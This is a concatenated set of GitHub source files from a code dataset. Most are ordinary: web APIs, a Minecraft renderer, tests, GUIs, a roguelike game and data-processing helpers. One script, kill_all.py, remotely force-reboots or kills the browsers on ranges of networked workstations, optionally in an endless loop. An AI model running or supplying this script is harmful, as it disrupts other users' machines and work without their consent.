= form.cleaned_data['Loan_Amount_Term']\n\t\t\tCredit_History = form.cleaned_data['Credit_History']\n\t\t\tGender = form.cleaned_data['Gender']\n\t\t\tMarried = form.cleaned_data['Married']\n\t\t\tGraduated = form.cleaned_data['Graduated']\n\t\t\tSelf_Employed = form.cleaned_data['Self_Employed']\n\t\t\tProperty_Area = form.cleaned_data['Property_Area']\n\n\t\t\tDict = (request.POST).dict()\n\t\t\tdf = pd.DataFrame(Dict, index = [0])\n\t\t\tprint(approvereject(ohevalue(df)))\n\telse: \n\t\tform = ApprovalForm()\n\n\treturn render(request, 'apiform/userform.html', {'form': form})","repo_name":"hudyu17/loan_approval","sub_path":"ApprovalAPI/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6170179916","text":"from re import I\nfrom flask import Response, request\nfrom flask_jwt_extended.utils import get_jwt_identity\nfrom flask_jwt_extended.view_decorators import jwt_required\nfrom mongoengine.errors import DoesNotExist\nfrom database.models import Product, User\nfrom flask_restful import Resource\nfrom utils.utils import *\nfrom urllib.parse import unquote\nfrom bson import json_util\nimport json\n\nclass CartApi(Resource):\n @jwt_required()\n def post(self):\n body = request.get_json()\n user_id = get_jwt_identity()\n product_id = body.get('product_id')\n quantity = body.get('quantity')\n if quantity == 0:\n try:\n user = User.objects.get(id=user_id, cart__product_id=product_id)\n except DoesNotExist:\n return {'error': 'Trying to delete an item that is not in the cart'}, 404\n else:\n for i in range(len(user.cart)):\n item = user.cart[i]\n if item['product_id'] == product_id:\n index = i\n break\n user.cart.pop(index)\n user.save()\n return {'msg': 'Success'}, 200\n else:\n try:\n user = User.objects.get(id=user_id, cart__product_id=product_id)\n except DoesNotExist:\n user = User.objects.get(id=user_id)\n new_dict = {\"product_id\": product_id, \"quantity\": quantity}\n if user.cart:\n user.cart.append(new_dict)\n else:\n user.cart = [new_dict]\n else:\n for item in user.cart:\n if(item['product_id'] == product_id):\n item['quantity'] = quantity\n user.save()\n return {'msg': 'Success'}, 200\n \n @jwt_required()\n def get(self):\n user_id = get_jwt_identity()\n user = User.objects.get(id=user_id)\n cart_items_with_quantity = []\n invalid_item_index = []\n cnt = 0\n if user.cart:\n for item in user.cart:\n try:\n cart_item = json.loads(Product.objects.get(id=item['product_id']).to_json())\n except DoesNotExist:\n invalid_item_index.append(cnt)\n else: \n cart_items_with_quantity.append({'product_summary': extract_basic_info(cart_item), 'quantity': item['quantity']})\n cnt+=1\n if invalid_item_index:\n for x in reversed(invalid_item_index):\n user.cart.pop(x)\n user.save()\n return Response(json.dumps(cart_items_with_quantity), mimetype=\"application/json\", status=200)\n","repo_name":"grocery-on-rails/grocery-backend","sub_path":"resources/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18177834020","text":"from bz2 import compress\nfrom keras.models import load_model\nimport keras.backend as K\nimport numpy as np\nimport pandas as pd\nimport random\nimport grpc\nimport minecraft_pb2_grpc\nfrom minecraft_pb2 import *\nimport sys\nimport argparse\nfrom blockid_to_type import blockid_to_type\n\n# connect to minecraft\nchannel = grpc.insecure_channel('localhost:5001')\nclient = minecraft_pb2_grpc.MinecraftServiceStub(channel)\n\n# mapping of blocks to compressed block categories\nmapping_df = pd.read_csv('../compression_csv.csv')\nid_to_type = {0:'AIR', 1:'STONE', 2:'GRASS', 5:'PLANKS', 8:'WATER', 12:'SAND', 18:'LEAVES', 20:'GLASS', 22:'LAPIS_BLOCK', 37:'YELLOW_FLOWER', 43:'STONE_SLAB', 53:'OAK_STAIRS', 85:'FENCE'}\n\n# This is hacky, but because we sort when we map the compressed values, we can decompress them by using the models output as an index for this list. 0 will always be air, 8 will always be glass (or w/e), etc\n# compressed_blocks = [0, 1, 2, 5, 12, 18, 20, 53, 85, 126]\n\n\nBOUNDS_WORLD = [[-30000000, 29999999], [4, 255], [-30000000, 29999999]]\nDIRECTIONS = [\"N\", \"W\", \"S\", \"E\", \"U\", \"D\"]\nDIRECTIONS_2D = [\"W\", \"E\", \"U\", \"D\"]\nORIENTATIONS = [\"O.N\", \"O.W\", \"O.S\", \"O.E\", \"O.U\", \"O.D\"]\n\n\nclass EvoRenderer():\n def __init__(self, model, model_type, bin_or_cat, struct_num, offset_x=20, offset_y=20):\n self.model = model\n self.struct_num = struct_num\n self.model_type = model_type\n self.bin_or_cat = bin_or_cat\n self.latent_size = model.layers[0].input_shape[0][1]\n self.offset_x = offset_x\n self.offset_y = offset_y\n self.compressed_blocks = [0, 1, 2, 5, 12, 18, 20, 53, 85, 126]\n self.offset = [0,0,0]\n #TODO: get the size of the structure we're using by looking at the last layer of our generative model\n\n\n # Evocraft variables\n self.BOUNDS_WORLD = [[-30000000, 29999999], [4, 255], [-30000000, 29999999]]\n self.DIRECTIONS = [\"N\", \"W\", \"S\", \"E\", \"U\", \"D\"]\n self.DIRECTIONS_2D = [\"W\", \"E\", \"U\", \"D\"]\n self.ORIENTATIONS = [\"O.N\", \"O.W\", \"O.S\", \"O.E\", \"O.U\", \"O.D\"]\n\n # clear map\n self.clean_zone([200, 200, 200], [0, 0, 0])\n\n # read the mapping dataframe\n self.mapping_df = pd.read_csv('../compression_csv.csv')\n\n # connect to minecraft server\n self.channel = grpc.insecure_channel('localhost:5001')\n self.client = minecraft_pb2_grpc.MinecraftServiceStub(channel)\n\n\n\n def decompress(self, gen_structs):\n # turns integer values back into block IDs by inverting our compression\n for val in np.unique(gen_structs):\n gen_structs[gen_structs == val] = self.compressed_blocks[val]\n\n return gen_structs\n\n\n # take latent vectors, and generate structures from them\n def generate_from_latent_categorical(self, model, latent_vectors):\n generated_structures = model.predict(latent_vectors)\n\n # a categorical GAN will output one-hot encoded, so this must turned back into categorical\n generated_structures = np.argmax(generated_structures, axis=4)\n\n return generated_structures\n\n # take latent vectors, and generate structures from them\n\n def generate_from_latent_binary(self, model, latent_vectors):\n generated_structures = model.predict(latent_vectors)\n return generated_structures\n\n\n # generates an array of random normal latent vectors\n def generate_latents_rn(self):\n return np.random.normal(0, 1, (self.struct_num, self.latent_size))\n\n\n \"\"\"RENDERING HELPERS\"\"\"\n def bound_coordinate(self, value, coord):\n \"\"\"\n Restrict the coordinate to the bounds.\n INPUT:\n value: a value\n coord: the index of the coordinate (0,1,2)\n\n OUTPUT:\n the value bounded according the bounds registered in BOUNDS_MINECRAFT above.\n \"\"\"\n low = BOUNDS_WORLD[coord][0]\n high = BOUNDS_WORLD[coord][1]\n return max(low, min(high, value))\n\n def bounded(self, position):\n \"\"\"\n Bounds the position according to BOUNDS_WORLD.\n INPUT:\n position: a 3D position.\n\n OUTPUT:\n bounded_position: a 3D position, within the boundaries given by BOUNDS_WORLD\n\n \"\"\"\n bounded_position = [self.bound_coordinate(position[0], 0), self.bound_coordinate(\n position[1], 1), self.bound_coordinate(position[2], 2)]\n return bounded_position\n\n def build_compression_list(self, mapping_df):\n pass\n\n # spawns a building\n def build_zone(self, blocks, offset):\n \"\"\"\n Build a 3D structure, given by a tensor specifiying the value of each block type at each position (3D), and possibly orientations\n Inputs:\n blocks: np array size Mx*My*MZ, where Mx,My,Mz are bounds given as input.\n\n \"\"\"\n positions = []\n blocks_index = []\n\n for x in range(blocks.shape[0]):\n for y in range(blocks.shape[1]): # this is height in minecraft\n for z in range(blocks.shape[2]):\n\n # get block type (will be a category from 0 to 9)\n block_id = int(blocks[x, y, z])\n\n # hacky decompression\n block_id = self.compressed_blocks[block_id]\n\n blocks_index.append(block_id)\n position = self.bounded([x+offset[0], y+offset[1], z+offset[2]])\n positions.append(position)\n\n zone = [offset[0], offset[1], offset[2], offset[0]+blocks.shape[0],\n offset[1]+blocks.shape[1], offset[2]+blocks.shape[2]]\n response = client.spawnBlocks(Blocks(blocks=[Block(position=Point(x=int(positions[i][0]), y=int(positions[i][1]), z=int(\n positions[i][2])), type=blockid_to_type[blocks_index[i]], orientation=NORTH) for i in range(len(blocks_index))]))\n\n return blocks_index\n\n\n #TODO: everything blow this\n \"\"\"CLEANING MAP POST-SELECTION\"\"\"\n def clean_positions(self, positions):\n \"\"\"\n As a way to clear out a space, place a block of AIR in each of the indicated positions.\n Input:\n positions: np.array of size N*3\n \"\"\"\n for i in range(positions.shape[0]):\n response = client.spawnBlocks(Blocks(blocks=[Block(position=Point(x=int(positions[i, 0]), y=int(\n positions[i, 1]), z=int(positions[i, 2])), type=AIR, orientation=NORTH)]))\n\n\n def clean_zone(self, bounds, offset):\n \"\"\"\n Cleans an area of space within certain bounds, by replacing them by block of AIR.\n Input:\n bounds: dimensions of the zone, list of 3 elements.\n offset: offset position.\n\n \"\"\"\n zone = [offset[0], 4, offset[2], offset[0] +\n bounds[0], 4+bounds[1], offset[2]+bounds[2]]\n print(\"Cleaning the following zone:\", zone)\n response = client.fillCube(FillCubeRequest(\n cube=Cube(min=Point(x=int(offset[0]-10), y=int(4), z=int(offset[2]-10)), max=Point(x=int(offset[0]+bounds[0]+10), y=int(\n 4+bounds[1]+10), z=int(offset[2]+bounds[2]+10))),\n type=AIR\n ))\n print(response)\n\n # wasserstein loss used for WGAN models. Needed to load WGAN from file\n def wasserstein_loss(self, y_true, y_pred):\n return K.mean(y_true * y_pred)\n\n\n def render(self, model):\n print(\"rendering structures...\")\n latents = self.generate_latents_rn()\n if self.bin_or_cat == \"bin\":\n structs = self.generate_from_latent_categorical(model, latents)\n else:\n structs = self.generate_from_latent_categorical(model, latents)\n\n for struct in structs:\n # use evocraft to draw all these into the server.\n rendered_struc = self.build_zone(struct, self.offset)\n self.offset[0] += self.offset_x\n self.offset[0] = 0\n self.offset[2] += - self.offset_y\n\n\n","repo_name":"TimMerino1710/Minecraft-Interactive-Evolution","sub_path":"interactive-evolution/evocraftrender.py","file_name":"evocraftrender.py","file_ext":"py","file_size_in_byte":7918,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"39688090841","text":"from unittest import TestCase\n\nfrom integration.resources.simple_dependency_classes import (\n FirstBaseChildrenDependencyClass,\n MixedDependenciesClientClass,\n SecondBaseChildrenDependencyClass,\n SimpleDependencyClientClass,\n SimpleDependencyDependencyClass,\n)\n\nfrom yandil.configuration.configuration_container import ConfigurationContainer\nfrom yandil.container import Container\nfrom yandil.dependency_filler import DependencyFiller\n\n\nclass TestDependencyFiller(TestCase):\n def setUp(self) -> None:\n self.container = Container(\n configuration_container=ConfigurationContainer(),\n )\n self.container.add(SimpleDependencyDependencyClass)\n self.container.add(FirstBaseChildrenDependencyClass)\n self.container.add(SecondBaseChildrenDependencyClass)\n self.dependency_filler = DependencyFiller(\n container=self.container,\n )\n\n def test_fill_dependencies(self):\n self.dependency_filler.fill(SimpleDependencyClientClass)\n\n container_dependency_class_instance = self.container[SimpleDependencyDependencyClass]\n client_class_instance = SimpleDependencyClientClass()\n self.assertIsInstance(client_class_instance, SimpleDependencyClientClass)\n self.assertEqual(container_dependency_class_instance, client_class_instance.dependency)\n\n def test_fill_dependencies_with_fixed_args(self):\n self.dependency_filler.fill(MixedDependenciesClientClass)\n\n container_dependency_class_instance = self.container[SimpleDependencyDependencyClass]\n client_class_instance = MixedDependenciesClientClass(\"arg\", kwarg=20)\n self.assertIsInstance(client_class_instance, MixedDependenciesClientClass)\n self.assertEqual(container_dependency_class_instance, client_class_instance.dependency)\n self.assertEqual(\"arg\", client_class_instance.arg)\n self.assertEqual(20, client_class_instance.kwarg)\n self.assertIsNone(client_class_instance.client_dependency_class)\n","repo_name":"DeejayRevok/yandil","sub_path":"tests/integration/test_dependency_filler.py","file_name":"test_dependency_filler.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"18687599863","text":"import csv\r\nfrom tkinter import*\r\nfrom tkinter import ttk\r\nfrom PIL import Image,ImageTk\r\nimport os\r\n\r\nclass See_Attendance_Section:\r\n def __init__(self,root):\r\n #Setting Up window form\r\n self.root=root\r\n self.root.geometry(\"670x100+480+390\")\r\n self.root.title(\"See Attendance\") \r\n self.root.resizable(False,False)\r\n self.root.focus_force()\r\n \r\n bg_img = Label(self.root,bg=\"white\")\r\n bg_img.place(x=0,y=0,relwidth=1,relheight=1)\r\n \r\n # Student Attendance Button\r\n start_atten=Image.open(r\"Images\\Student_See_Attendance.png\") \r\n start_atten=start_atten.resize((300,50),Image.ANTIALIAS)\r\n self.photostart_atten=ImageTk.PhotoImage(start_atten) \r\n\r\n b1=Button(bg_img,image=self.photostart_atten,command=self.std_atndd,cursor=\"hand2\",bd=2,relief=RIDGE,fg=\"white\",bg=\"black\",activeforeground=\"black\",activebackground=\"black\")\r\n b1.place(x=5,y=20,width=300,height=50)\r\n\r\n # Teacher Attendance Button\r\n save_atten=Image.open(r\"Images\\Teacher_See_Attendance.png\") \r\n save_atten=save_atten.resize((300,50),Image.ANTIALIAS)\r\n self.photosave_atten=ImageTk.PhotoImage(save_atten) \r\n\r\n b2=Button(bg_img,image=self.photosave_atten,command=self.tch_atndd,cursor=\"hand2\",bd=2,relief=RIDGE,fg=\"white\",bg=\"black\",activeforeground=\"black\",activebackground=\"black\")\r\n b2.place(x=355,y=20,width=300,height=50)\r\n \r\n def std_atndd(self):\r\n os.startfile(\"Attendance_Sheet\")\r\n \r\n def tch_atndd(self):\r\n os.startfile(\"Teacher_Attendance_Sheet\")\r\n\r\nif __name__ == \"__main__\":\r\n root=Tk()\r\n obj=See_Attendance_Section(root)\r\n root.mainloop()","repo_name":"DipakAgarwal0703/FRAMS","sub_path":"See_Attendance.py","file_name":"See_Attendance.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29872103303","text":"import pygame\n# from random import choice, randint\nfrom my_basic_functions import *\n\nfrom pygame.locals import (\n K_UP,\n K_DOWN,\n K_LEFT,\n K_RIGHT,\n K_ESCAPE,\n KEYDOWN,\n QUIT,\n K_a,\n K_b,\n)\npygame.init()\n\n# Window Parameters\nGRID_SIZE = 48\nNUMBER_OF_SQUARES = 17\nGUI_SIZE = 2\nTEXT_RECORD_SIZE = 4\nWIDTH = GRID_SIZE * (NUMBER_OF_SQUARES + TEXT_RECORD_SIZE) # screen width\nLENGHT = GRID_SIZE * (NUMBER_OF_SQUARES + GUI_SIZE)\nscreen = pygame.display.set_mode([WIDTH, LENGHT])\nboardgame = pygame.Surface((NUMBER_OF_SQUARES*GRID_SIZE, NUMBER_OF_SQUARES*GRID_SIZE))\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\n\ndef size_sprites(file_location, grid_size=GRID_SIZE):\n end_product = pygame.image.load(file_location)\n end_product = pygame.transform.scale(end_product, (grid_size, grid_size))\n return end_product\n\n\ndef make_ground(base_map, base_dict, grid_size, number_of_squares):\n for i in range(number_of_squares):\n for x in range(number_of_squares):\n boardgame.blit(base_dict[base_map[x][i]], (x*grid_size, i*grid_size))\n\n\ndef draw_char(lista_char, grid_size):\n for i in lista_char:\n boardgame.blit(i.surface, pos_to_coordinates(i.pos_x, i.pos_y, grid_size))\n\n\ndef draw_GUI(list_GUI, grid_size=GRID_SIZE):\n for i in list_GUI:\n screen.blit(i, (list_GUI.index(i)*grid_size*2, NUMBER_OF_SQUARES*grid_size))\n pygame.draw.line(\n screen,\n WHITE,\n (list_GUI.index(i)*grid_size*2,\n NUMBER_OF_SQUARES*grid_size),\n (list_GUI.index(i)*grid_size*2,\n NUMBER_OF_SQUARES*(6+grid_size))\n )\n\n\ndef update_avatar(base_surface, surface_to_add):\n return base_surface.blit(surface_to_add, (0, 0))\n\n\n# creatures\nsnake = size_sprites('assets/grey_snake.png')\nelf = size_sprites('assets/deep_elf_high_priest.png')\nfire = size_sprites('assets/i-rod_destruction_fire.png')\nogre = size_sprites('assets/ogre.png')\n# floor tiles\nstone_floor = size_sprites('assets/stone_floor.png')\nwater_floor = size_sprites('assets/water_floor.png')\ngrass_floor = size_sprites('assets/grass_floor.png')\n# obejcts\nrock = size_sprites('assets/rock.png')\nrock2 = size_sprites('assets/rock.png', 96)\narrow = size_sprites('assets/arrow2.png', 96)\nflame = size_sprites('assets/flame.png', 96)\nsnake2 = size_sprites('assets/grey_snake.png', 96)\n# status\nfire_status = pygame.image.load('assets/i-rod_destruction_fire.png')\nwater_status = pygame.image.load('assets/i-water.png')\n\n# dictionary that relates map with sprites\nfloor_dict = {\"s\": stone_floor, \"w\": water_floor, \"g\": grass_floor}\nlevel_map = create_map(NUMBER_OF_SQUARES, floor_dict)\nchar_base_map = [[9, 1]]\n\n\nclass Ogre:\n def __init__(self):\n self.surface = size_sprites('assets/ogre.png')\n self.initial_pos = pos_validator(char_base_map, NUMBER_OF_SQUARES)\n self.pos_x = self.initial_pos[0]\n self.pos_y = self.initial_pos[1]\n self.hp = 15\n self.wet = False\n self.old_surface = ogre\n\n def move_randomly(self):\n self.pos_x += randint(-1, 1)\n self.pos_y += randint(-1, 1)\n\n def get_hurt(self, damage):\n self.hp -= damage\n\n\nclass Rock:\n def __init__(self, pos_x, pos_y):\n self.surface = rock\n self.pos_x = pos_x\n self.pos_y = pos_y\n self.wet = False\n\n\nclass Player:\n def __init__(self):\n self.surface = elf\n self.pos_x = 9\n self.pos_y = 1\n self.rock_level = 1\n\n def move_up(self):\n if self.pos_y != 0:\n self.pos_y -= 1\n\n def move_down(self):\n if self.pos_y != NUMBER_OF_SQUARES - 1: # number_of_squares - 1 = BOARDGAME\n self.pos_y += 1\n\n def move_right(self):\n if self.pos_x != NUMBER_OF_SQUARES - 1: # number_of_squares - 1 = BOARDGAMES\n self.pos_x += 1\n\n def move_left(self):\n if self.pos_x != 0:\n self.pos_x -= 1\n\n def summon_rock(self):\n for i in get_radius_area([self.pos_x, self.pos_y], self.rock_level):\n list_char.append(Rock(i[0], i[1]))\n\n\nelfo1 = Player()\n\nogro1 = Ogre()\nogro2 = Ogre()\nlist_char = [Rock()]\n# list_char = [Ogre() for i in range(4)]\nlist_char2 = [elfo1]\nlist_GUI = [rock2, snake2, arrow]\n\n\nrunning = True\nwhile running:\n make_ground(level_map, floor_dict, GRID_SIZE, NUMBER_OF_SQUARES)\n draw_GUI(list_GUI)\n draw_char(list_char, GRID_SIZE)\n draw_char(list_char2, GRID_SIZE)\n screen.blit(boardgame, (0, 0))\n # water_tile_checker(list_char, [[0,0], [1, 1], [5, 5]])\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_UP:\n elfo1.move_up()\n elif event.key == K_DOWN:\n elfo1.move_down()\n elif event.key == K_LEFT:\n elfo1.move_left()\n elif event.key == K_RIGHT:\n elfo1.move_right()\n elif event.key == K_DOWN:\n elfo1.move_down()\n elif event.key == K_a:\n elfo1.summon_rock()\n elif event.key == K_b:\n push_action(list_char, [elfo1.pos_x, elfo1.pos_y])\n elif event.key == K_ESCAPE:\n running = False\n elif event.type == QUIT:\n running = False\n pygame.display.flip()\n\npygame.quit()\n","repo_name":"ramirog1994/RogueLike_Tutorial","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31647094591","text":"import os\r\nimport sys\r\nimport threading\r\nBASE_NAMES = input(\"Enter a space seperated list of base names: \").strip().split()\r\nMIN_NUM = int(input(\"Min Workstation number: \"))\r\nMAX_NUM = int(input(\"Max Workstation number: \"))\r\nprint( \"Choose your base name:\\n\\tBase Names:\\n\"+\"0) None\\n\"+\"\\n\".join([str(i+1)+\") \" + BASE_NAMES[i] for i in range(len(BASE_NAMES))]))\r\nOWN_BASE = int(input().strip())-1\r\nOWN_WS = -1\r\nthreads = []\r\nKILL = False\r\nif OWN_BASE > -1:\r\n OWN_WS = int(input(\"Enter your Workstation number: \"))\r\nparams = \"/r /f /t 0\"\r\nTKILL = input(\"Kill remote processes instead of shutdown?(y/n)\").lower()[0] == \"y\"\r\nTO_KILL = [\"chrome\",\"firefox\",\"iexplore\",\"MicrosoftEdge\"]\r\nif TKILL:\r\n NEW_TO_KILL = input(\"Enter proccess names to kill seperated by a space\\nDefault:\\n\"+\"\\n\".join(\"\\t\"+TO_KILL[proc_ind] + (\"\\n\" if proc_ind == len(TO_KILL)-1 else \"\") for proc_ind in range(len(TO_KILL)))).strip().split()\r\n if len(NEW_TO_KILL) > 0:\r\n TO_KILL = NEW_TO_KILL\r\n print(\"Targeting:\\n\" + \"\\n\".join(\"\\t\"+proc for proc in TO_KILL))\r\nelse:\r\n user_params = input(\"Enter shutdown params(default: /r /f /t 0): \").strip()\r\n if len(user_params) > 0:\r\n params = user_params\r\nLOOP_FOREVER = input(\"Loop forever?(y/n)\").strip().lower()[0] == \"y\"\r\ndef pad_if_1(n):\r\n if len(str(n)) == 1:\r\n return \"0\"+str(n)\r\n else:\r\n return str(n)\r\ndef shutdown(ws,params,loop=False):\r\n os.system(\"@echo off & shutdown \"+params+\" /m \\\\\\\\\"+ws + \">nul 2>nul\")\r\n while loop:\r\n if KILL:\r\n return\r\n os.system(\"@echo off & shutdown \"+params+\" /m \\\\\\\\\"+ws + \" >nul 2>nul\")\r\ndef task_kill(ws,loop=False):\r\n for proc in TO_KILL:\r\n os.system(\"@echo off & taskkill /S \"+ws+\" /IM \" + proc + \"* /F >nul 2>nul\")\r\n while loop:\r\n if KILL:\r\n return\r\n for proc in TO_KILL:\r\n os.system(\"@echo off & taskkill /S \"+ws+\" /IM \" + proc + \"* /F >nul 2>nul\")\r\nfor base in BASE_NAMES:\r\n for ws_id in range(MIN_NUM,MAX_NUM+1,1):\r\n ws_name = base+pad_if_1(ws_id)\r\n if OWN_BASE > -1 and OWN_WS > -1 and BASE_NAMES[OWN_BASE] == base and ws_id == OWN_WS:\r\n print(\"\\nSkipping\",ws_name)\r\n continue\r\n print(\"\\nTarget:\",ws_name)\r\n if not TKILL:\r\n print(\"Executing shutdown with params:\",params)\r\n else:\r\n print(\"Killing specified processes\")\r\n if LOOP_FOREVER:\r\n print(\"Looping...\")\r\n if not TKILL:\r\n nthread = threading.Thread(target=shutdown,args=(ws_name,params,LOOP_FOREVER))\r\n threads.append(nthread)\r\n nthread.start()\r\n else:\r\n nthread = threading.Thread(target=task_kill,args=(ws_name,LOOP_FOREVER))\r\n threads.append(nthread)\r\n nthread.start()\r\nwhile len(threads) and not KILL:\r\n try:\r\n pass\r\n except KeyboardInterrupt:\r\n KILL = True\r\n for t in threads:\r\n t.join()\r\n print(\"Exiting...\")\r\n sys.exit(0)\r\nprint(\"\\nDone\")\r\nsys.exit(0)\r\n","repo_name":"WarrenHood/kill_all","sub_path":"kill_all.py","file_name":"kill_all.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72038734452","text":"from nltk.stem import PorterStemmer\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nimport numpy as np\n\nfrom nltk.corpus import names\nALL_NAMES = set(names.words())\n\ndef read_feature_names():\n with open(\"data/feature_names.txt\", 'r') as f:\n feature_space = f.read().split('\\n')\n return feature_space\n\ndef word_stemmer(words):\n stemmer = PorterStemmer()\n stem_words = [stemmer.stem(o) for o in words]\n return stem_words\n\ndef word_lemmatizer(words):\n lemmatizer = WordNetLemmatizer()\n lemma_words = [lemmatizer.lemmatize(o) for o in words]\n return lemma_words\n\ndef words_from_text(text: str) -> list[str]:\n return text.split(\" \")\n\ndef text_from_words(words: list[str]) -> str:\n return \" \".join(words)\n\ndef tokenize(text: str) -> list[str]:\n return word_tokenize(text)\n\ndef is_letter_only(word: str) -> bool:\n for char in word:\n if not char.isalpha():\n return False\n return True\n\ndef clean_text(text: str) -> str:\n \"\"\"\n input: text\n Eg text = \n '''\n we could have had it all\n rolling in the deep\n you had my heart inside you hand\n but you played it to the beat\n '''\n\n output: Cleaned text(no names and only alphaneumeric)\n \"\"\"\n text_cleaned = []\n words = tokenize(text)\n\n for word in words:\n word = word.lower()\n if is_letter_only(word) and word not in ALL_NAMES:\n text_cleaned.append(word)\n\n text_cleaned = text_from_words(text_cleaned)\n return text_cleaned\n\ndef text_to_feature_array(text: str) -> np.array:\n feature_space = read_feature_names()\n result = []\n cleaned_text = clean_text(text)\n tokens = tokenize(cleaned_text)\n for token in tokens:\n if token in feature_space:\n result.append(feature_space.index(token))\n\n return np.array(result)\n\n","repo_name":"jatin837/spambuster","sub_path":"lib/processors.py","file_name":"processors.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5447449456","text":"def get_day_of_week(number):\n days_of_week = {1: \"Monday\", 2: \"Tuesday\", 3: \"Wednesday\", 4: \"Thursday\", 5: \"Friday\", 6: \"Saturday\", 7: \"Sunday\"}\n\n if 1 <= number <= 7:\n return days_of_week[number]\n else:\n return \"Invalid day number. Please enter a number between 1 and 7.\"\n\ndef main():\n try:\n number = int(input(\"Enter a number (1-7) to get the corresponding day of the week: \"))\n result = get_day_of_week(number)\n print(result)\n except ValueError:\n print(\"Error: Please enter a valid numerical value.\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"kolyasalubov/UA-12-10-23.PythonFundamentals","sub_path":"GlotovES/HW11/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"39109899634","text":"from __future__ import absolute_import\n\nimport logging\nimport pandas as pd\nimport asyncio\n\nfrom adit.controllers import TileDBController, EventLoopController, TPOOL\n\n__all__ = ['MetricsCalculator']\n\n\nclass MetricsCalculator:\n _CCY_PAIRS = ['EURUSD', 'USDJPY', 'EURJPY']\n TASK_NAME = \"data-metric-cal\"\n _INSTANCE = None\n\n def __init__(self):\n self.logger = logging.getLogger(self.__class__.__name__)\n self.tiledb = TileDBController.instance()\n self.evl = EventLoopController.instance()\n self.evl_loop = self.evl.get_loop()\n self.frequency = 86400 # 1 day\n\n def _cal_metrics(self, pair, from_ts, to_ts):\n self.logger.debug(f\"getting data of pair {pair} to calculate midclose rate\")\n df = self.tiledb.get_ts_dataframe('raw', pair, from_ts, to_ts)\n\n self.logger.debug(f\"resample data of pair {pair} to daily and drop NaN data row\")\n df = df.set_index('date').resample('D').last().dropna(axis=0, how='all')\n\n if len(df.index) < 2:\n self.logger.debug(f\"data is not enough to perform metrics calculation, at least 2 day worth of data\")\n return\n\n self.logger.debug(f\"calculate midclose rate data of pair {pair} and drop unnecessary data\")\n df['midclose'] = (df['bidclose'].abs() + df['askclose'].abs()) / 2\n df = df.drop(columns=['bidopen', 'bidclose', 'bidhigh', 'bidlow', 'askopen', 'askclose', 'askhigh', 'asklow', 'tickqty'])\n\n self.logger.debug(f\"calculate log return of midclose of pair {pair}\")\n logret_df = df.pct_change().rename(columns={\"midclose\": \"logret\"})\n\n self.logger.debug(f\"calculate exponential moving average of log return of pair {pair}\")\n ema_df = logret_df.ewm(alpha=0.5, adjust=True, ignore_na=True, min_periods=5).mean().rename(columns={\"logret\": \"logret_ema\"})\n\n df = pd.merge(df, logret_df, how='inner', left_index=True, right_index=True)\n df = pd.merge(df, ema_df, how='inner', left_index=True, right_index=True)\n self.logger.debug(f\"store daily metrics of {pair} to tiledb\")\n self.tiledb.store_df(\"health\", f\"{pair}_DAILY_METRICS\", df)\n\n def cal_metrics(self, pair, from_ts, to_ts):\n self.logger.debug(f\"awaiting for metric fcalculation rom {from_ts} to {to_ts} for pair {pair}\")\n self._cal_metrics(pair, from_ts, to_ts)\n\n def cal(self, from_ts=None, to_ts=None):\n for pair in self._CCY_PAIRS:\n self.logger.debug(f\"calculate metric from {from_ts} to {to_ts} for pair {pair}\")\n data_domain = self.tiledb.get_data_domain('raw', pair)\n if not from_ts:\n from_ts = data_domain[0]\n\n if not to_ts:\n to_ts = data_domain[1]\n\n self.cal_metrics(pair, from_ts, to_ts)\n\n async def cal_async(self):\n for pair in self._CCY_PAIRS:\n from_ts = self.tiledb.get_data_domain(\"health\", f\"{pair}_DAILY_METRICS\")[1]\n to_ts = self.tiledb.get_data_domain(\"raw\", pair)[1]\n if to_ts > from_ts:\n self.logger.debug(f\"calculate data metrics from {from_ts} to {to_ts}\")\n await self.evl_loop.run_in_executor(TPOOL, self.cal_metrics, pair, from_ts, to_ts)\n else:\n self.logger.debug(f\"data metrics is already up to date\")\n\n def start(self):\n self.evl.shedule_task(self.TASK_NAME, self._run)\n\n def stop(self) -> None:\n self.evl.stop_task(self.TASK_NAME)\n\n async def _run(self, queue):\n self.logger.info(\"starting fxcm data crawler\")\n while True:\n try:\n await self.cal_async()\n await asyncio.sleep(self.frequency)\n except Exception as ex:\n self.logger.error(\"fxcm crawler has exception\", exc_info=ex)\n try:\n self.stop()\n except:\n pass\n break\n\n @classmethod\n def instante(cls):\n if cls._INSTANCE is None:\n cls._INSTANCE = MetricsCalculator()\n return cls._INSTANCE\n\n\n\n","repo_name":"trinhtrannp/adit","sub_path":"adit/processor/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44355270431","text":"import os\nimport pytest\nimport random\nimport string\nfrom collections import Counter\n\nfrom word_parser.parser import Parser\n\nFILE_PATH = os.path.dirname(__file__)\n\n\n@pytest.fixture(scope=\"function\")\ndef test_input():\n with open(f\"{FILE_PATH}/test_input.txt\") as input_file:\n words = 